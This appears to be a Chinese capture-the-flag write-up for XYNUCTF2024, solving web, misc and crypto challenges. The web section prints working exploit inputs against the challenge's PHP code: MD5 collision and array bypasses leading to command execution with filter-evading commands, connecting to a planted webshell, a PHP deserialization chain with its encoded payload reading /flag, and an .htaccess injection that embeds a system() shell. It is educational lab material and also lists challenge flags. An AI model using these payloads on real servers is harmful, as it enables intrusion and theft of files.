RE：XYNUCTF2024信安杯

WEB

哎~想她了

F12与右键被禁用

使用view-source:查看代码

<?php
//flag in /flag

highlight_file(__FILE__);
error_reporting(0);
$a = $_GET['fj1'];
$b = $_GET['fj2'];
if($a!==$b&&md5($a)===md5($b)){
    if(isset($_GET['cmd'])){
        $cmd = $_GET['cmd'];
        if(!preg_match("/\;|cat|flag|[0-9]|\\$|\*|more|system|exec|tac/i", $cmd)){
            system($cmd);
        }
        else{
            die("哎~就差一点儿~我就可以拉到她的手~");
        }
    }
}
else{
    echo "哎~想她了~";
}
?> 哎~想她了~

传入两个参数fj1与fj2

md5($a)===md5($b)md5强比较

方法一：

使用

?fj1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&fj2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

方法二：

使用数组

?fj1[]=1&fj2[]=2

最后传入cmd rce

&cmd=ta\c /fla\g
&cmd=nl /fla\g
&cmd=tail /fla\g

Can_can_need

使用dirsearch扫描发现存在www.zip为网站源码

在js目录中发现存在cancanneed.php

里边是一句话木马

使用蚁剑或者哥斯拉连接

连接后get flag

Ez_serial

<?php
highlight_file(__FILE__);
error_reporting(0);

class artifact{
    public $excalibuer;
    public $arrow;
    public function __toString(){
        echo "how to bypass?";
        return $this->excalibuer->arrow;
    }
}

class prepare{
    public $release;
    public function __get($key){
        $functioin = $this->release;
        echo "prepare to hack";
        return $functioin();
    }
}
class hacking{
    public $weapon;
    public function __invoke(){
        echo "win!";
        include($this->weapon);
    }
}
class summon{
    public $Hacker;
    public $Rider;

    public function __wakeup(){
        echo "start hacking";
        echo $this->Hacker;
    }
}

if(isset($_GET['payload'])){
    unserialize($_GET['payload']);
}
?>

考察php反序列化

类似与ISCTF2023的圣杯战争!!!

php反序列化

__invoke() ：将对象当作函数来使用时执行此方法

__get() ：获得一个类的成员变量时调用,用于从不可访问的成员获取值的时候触发

__toString()： 当一个对象被当作字符串使用时触发

首先先找反序列化链入口，这里没有 __destruct()，能触发的只有 __wakeup()，入口从__wakeup()进，出口从__invoke()的include

出现的魔术函数，有 __wakeup()，__toString()，__invoke()，__get()

__wakeup()是入口，$this->Saber 是被当成字符串使用的，进入 __toString()，然后__get()，触发__invoke()伪协议包含读文件

<?php

class artifact{
    public $excalibuer;
    public $arrow;
    public function __construct(){
        $this->excalibuer = new prepare();
        $this->arrow = new prepare();
    }
}

class prepare{
    public $release;
    public function __construct(){
        $this->release = new hacking();
    }
}
class hacking{
    public $weapon;
    public function __construct(){
        $this->weapon = "php://filter/read=convert.base64-encode/resource=/flag";
    }
}
class summon{
    public $Hacker;
    public $Rider;

    public function __construct(){
        $this->Hacker = new artifact();
        $this->Rider = "";
    }
}

$a = new summon();

$serialized = serialize($a);

echo urlencode($serialized)
?>

注意：

__wakeup(),__toString,__get,__invoke,__wakeup需要使用__construct()用于对象的初始化

对于include()函数如果无法直接包含flag，可使用php伪协议文件包含

flag可能在当前目录，也可能在根目录

payload:

O:6:"summon":2:{s:6:"Hacker";O:8:"artifact":2:{s:10:"excalibuer";O:7:"prepare":1:{s:7:"release";O:7:"hacking":1:{s:6:"weapon";s:54:"php://filter/read=convert.base64-encode/resource=/flag";}}s:5:"arrow";O:7:"prepare":1:{s:7:"release";O:7:"hacking":1:{s:6:"weapon";s:54:"php://filter/read=convert.base64-encode/resource=/flag";}}}s:5:"Rider";s:0:"";}

urlencode:

O%3A6%3A%22summon%22%3A2%3A%7Bs%3A6%3A%22Hacker%22%3BO%3A8%3A%22artifact%22%3A2%3A%7Bs%3A10%3A%22excalibuer%22%3BO%3A7%3A%22prepare%22%3A1%3A%7Bs%3A7%3A%22release%22%3BO%3A7%3A%22hacking%22%3A1%3A%7Bs%3A6%3A%22weapon%22%3Bs%3A54%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D%2Fflag%22%3B%7D%7Ds%3A5%3A%22arrow%22%3BO%3A7%3A%22prepare%22%3A1%3A%7Bs%3A7%3A%22release%22%3BO%3A7%3A%22hacking%22%3A1%3A%7Bs%3A6%3A%22weapon%22%3Bs%3A54%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D%2Fflag%22%3B%7D%7D%7Ds%3A5%3A%22Rider%22%3Bs%3A0%3A%22%22%3B%7D

Ez_htaccess

<?php
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nHello, world");
?>

需要传入content与filename这两个参数

对于content参数存在过滤on html type flag upload file

对于filename参数存在限制只能由 a-z和.构成

file_put_contents($filename, $content . "\nHello, world"); 

将我们传入的内容content写入filename里面
但注意这里拼接了一个Hello world，会造成我们程序报错

可以传一个.htaccess文件来写shell
虽然过滤了file,但是可以使用fil\e来绕过，并且通过#来写入shell
这是因为#在htaccess中是注释符的作用，但是在php执行的时候，一句话木马就会被执行
最后的\是为了与后面的Hello word进行拼接，不然会报错

payload：

?content=php_value auto_prepend_fil\
e .htaccess
#<?php system('tac /f*');?>\&filename=.htaccess

url编码后
?content=php_value%20auto_prepend_fil\%0ae%20.htaccess%0a%23<?php%20system('tac /f*');?>\&filename=.htaccess

MISC

ez_Misc

第一张图片发现文件流逆置

with open('WFlOVUNURnt0aGlzX2.png','rb') as f:
 
   with open('flag.png','wb') as g:
 
      g.write(f.read()[::-1])

V0ZsT1ZVTlVSbnMyTm1FM1lqTTJNeTFtWXpoaExU

修复宽高得到另一段base64

RXhaV1V0T1dZek1DMDNZemN3WkdJd1l6azFOam

第二张图片属性中发现第三段:g5

V0ZsT1ZVTlVSbnMyTm1FM1lqTTJNeTFtWXpoaExURXhaV1V0T1dZek1DMDNZemN3WkdJd1l6azFOamg5

拼接得到flag

can_you_find_me_misc_version

提示1：文件名字是不是有用

提示2：好像得用winrar解压qwq

提示3：ntfs是什么？好高深的样子

steghide提取密码为文件名字qjzhalx

得到压缩包

解压后得到520个文本

根据提示考察NTFS数据流使用NtfsStreamsEditor查看，或者AlternateStreamView

https://www.nirsoft.net/utils/alternate_data_streams.html

得到53543345134421241311334412153124155115543445212433143215

敲击码解密得到XYNUC(K)TFIC(K)ANTBELIEVEYOUFINDME

XYNUCTF{ICANTBELIEVEYOUFINDME}

CRYPTO

eeezzz~

CyberChef一键梭哈

JSyBIHAHEafkBTR5Zmp3ZF1uBTMvYJR2BTRgBGV4Zl0kMzAzAQNjMQLjAwM9

ezRSA

得到c p e n

分解n得到q

import gmpy2
from Crypto.Util.number import long_to_bytes

# 已知参数
c = 93655757414488700681149407647174718883584755571642779976116282971361584953111778981383753910661068043194440330989616417374667975567016383009512328537244020899225119380087616554181365008580089769783119780856907788858277120813547389932423145427819176874486801537623437382558310764195344711439593507343675773233
p = 10180592076005446332230241597677885360697193611327281572320260575329747480409270948034563147937267851548423976797667371597874358473047639747765866625373889
e = 65537
n = 103644455018024883549492951696304881575515841808598551796839280510343078353764734934767375524286724583709738993742187259022379886519063286689310578946873089402344993063518975573867077255077084098492563872935348185333826182624952760822846673410486242900855352118260218201795814674346657392593754838249042984321
q = n // p
y = n % p
print("y=",y) #如果y=0那就说明分解正确
print("q=", q)
d = gmpy2.invert(e, (p - 1) * (q - 1))
print("d=", d)
m = pow(c, d, n)
print("m=", m)
print(long_to_bytes(m))

得到

b'\n\xad\xcc\xfb\x9ec\x84\xf8\x1cLp:\x8c\\\x18\xa6r\xfc\xb5F\x89kJ\x9d<\xe3\xe4^\x04=II\xc7\xfe\x1fnvS\x90dWs]4&\xbc}\xbdnl\xa1"J\x1c\x8aU\xb5(\xd3\x81]\x08\x00\xa0\xfc\x93\x97\x8b\xa85e\xb7\xb8%\xfd\xa8\xf2\xb1\xc0m\xe8[e\x7f\x04\xa8\xdci\x82\xc6Rv\x0eF\xbf_\xf4#\t}o\xa8\xf1\xeb\x0b\xc5\xbdJo\xb5\xe0\xf5,Z(\x9bd\xfa\xcdHB"\xa3\x7f\xb4\xa3Q\xca'

flag{e3a94725-a68f-4a1e-a7e9-d7dc34262b24}

md5

# 66907e0781b3e3ec67b4cde8054cf44c
# 48164f73d0787125c4efabbb438227ab
# b2f04a8f053e6c9de4c6d2be1259e1a4
# c8e34e08ebc44c6816b3846626ce5acf

在cmd5.com解码

# 66907e0781b3e3ec67b4cde8054cf44c -> vid8
# 48164f73d0787125c4efabbb438227ab -> 5r1y
# b2f04a8f053e6c9de4c6d2be1259e1a4 -> cbs6
# c8e34e08ebc44c6816b3846626ce5acf -> N724

最后拼起来vid85r1ycbs6N724

加XYNUCTF{}

墨多多的密码

tip:

• 把字母横过来看看像什么？
• 仔细想一想有什么密码会需要密钥呢

字母横过来为RHBZ

010查看发现存在密文

BGTBVXN{ok0gx1qqlvp@aYpvetvdw!!!}

可能是凯撒或者维吉尼亚密码

由于需要密码应该为维吉尼亚密码

密码为8或者eight